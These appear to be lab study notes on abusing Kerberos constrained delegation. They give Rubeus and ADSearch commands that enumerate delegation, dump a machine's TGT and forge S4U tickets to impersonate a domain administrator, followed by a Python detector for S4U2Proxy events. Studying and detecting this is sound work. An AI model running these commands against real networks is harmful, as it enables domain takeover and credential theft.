Constrained Delegation

A safer way for services to perform Kerberos delegation. It restricts the set of services to which a server may delegate on behalf of a user (and the server no longer caches other users' TGTs, as it does with unconstrained delegation).

Search for computers whose msds-allowedtodelegateto attribute is not empty

ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Get the TGT of the principal (computer or user) trusted for delegation

Rubeus.exe triage

0x3e4    | sql-2$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO
Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

You can also request one with Rubeus asktgt if you have the principal's NTLM or AES hash.

With the TGT, perform an S4U request to obtain a usable TGS for CIFS

Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

Where:

  /impersonateuser is the user we want to impersonate; they should have local admin access on the target machine.
  /msdsspn is the service principal name that SQL-2 is allowed to delegate to.
  /user is the principal allowed to perform the delegation.
  /ticket is the TGT for /user.

Rubeus performs an S4U2Self request first and then an S4U2Proxy request. It is this final S4U2Proxy ticket that we need.

Example simple attack chain

In this example the user 'Blake' has msds-allowedtodelegateto set.

  1. Get a session as Blake, either through RDP or other ways.

  2. Request a ticket for the current session with Rubeus.

  3. Using Rubeus, we can now request a TGS for the administrator account, who will be allowed to authenticate to CIFS/dc.painters.htb.

  4. We've got the impersonated TGS tickets for the administrator account, which, as we can see, are now in the memory of the current logon session.

  5. If we now attempt to access the file system of the DC from the user's terminal, we can confirm we've successfully impersonated the domain administrator account, which can authenticate to the CIFS service on the domain controller DC01.

(We can now use psexec.)
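As an added detection-side example (not part of these notes), the Python below triages flattened Windows Security 4769 records for S4U2Proxy requests: a service ticket obtained through S4U2Proxy leaves a populated Transited Services field naming the delegating account, which ordinary TGS requests leave as "-". The record layout, the baseline of msDS-AllowedToDelegateTo values and the privileged-user watchlist are constructed assumptions for this example.

```python
# Added example, not from the original notes: triage Windows Security event 4769
# ("A Kerberos service ticket was requested") for S4U2Proxy activity. S4U2Proxy
# tickets carry a populated Transited Services (TransmittedServices) field naming
# the delegating account; plain TGS requests leave it as "-".
# All records, baselines and watchlists below are constructed for this example.

def parse_event(line: str) -> dict:
    """Parse one flattened 'Key=Value;Key=Value' 4769 record into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if "=" in kv)

def find_s4u2proxy(lines, allowed_to_delegate_to, privileged_users):
    """Return one finding per S4U2Proxy-derived 4769 record.

    allowed_to_delegate_to: delegating account -> set of SPNs from its
        msDS-AllowedToDelegateTo attribute (a baseline the analyst maintains).
    privileged_users: sAMAccountNames whose impersonation should be reviewed.
    """
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        delegator = ev.get("TransmittedServices", "-")
        if delegator == "-":
            continue  # plain TGS request, no delegation involved
        spn = ev.get("ServiceName", "").lower()
        impersonated = ev.get("TargetUserName", "").split("@")[0].lower()
        expected = {s.lower() for s in allowed_to_delegate_to.get(delegator, ())}
        findings.append({
            "delegator": delegator,
            "impersonated": impersonated,
            "spn": spn,
            # SPN absent from the delegator's baseline: configuration drift or a
            # stale baseline, worth a look either way
            "outside_baseline": spn not in expected,
            # a constrained-delegation account impersonating a privileged user to
            # a sensitive SPN is the pattern the notes above describe
            "privileged_target": impersonated in privileged_users,
        })
    return findings

# Constructed sample records (the first mirrors the s4u command in the notes).
SAMPLE_4769 = """\
TargetUserName=nlamb@DEV.CYBERBOTIC.IO;ServiceName=cifs/dc-2.dev.cyberbotic.io;TransmittedServices=sql-2$@DEV.CYBERBOTIC.IO
TargetUserName=jdoe@DEV.CYBERBOTIC.IO;ServiceName=cifs/fs-1.dev.cyberbotic.io;TransmittedServices=-
TargetUserName=jdoe@DEV.CYBERBOTIC.IO;ServiceName=ldap/dc-2.dev.cyberbotic.io;TransmittedServices=web-1$@DEV.CYBERBOTIC.IO
"""
BASELINE = {"sql-2$@DEV.CYBERBOTIC.IO": {"cifs/dc-2.dev.cyberbotic.io"},
            "web-1$@DEV.CYBERBOTIC.IO": {"http/api-1.dev.cyberbotic.io"}}
PRIVILEGED = {"nlamb", "administrator"}

if __name__ == "__main__":
    for finding in find_s4u2proxy(SAMPLE_4769.splitlines(), BASELINE, PRIVILEGED):
        print(finding)
```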
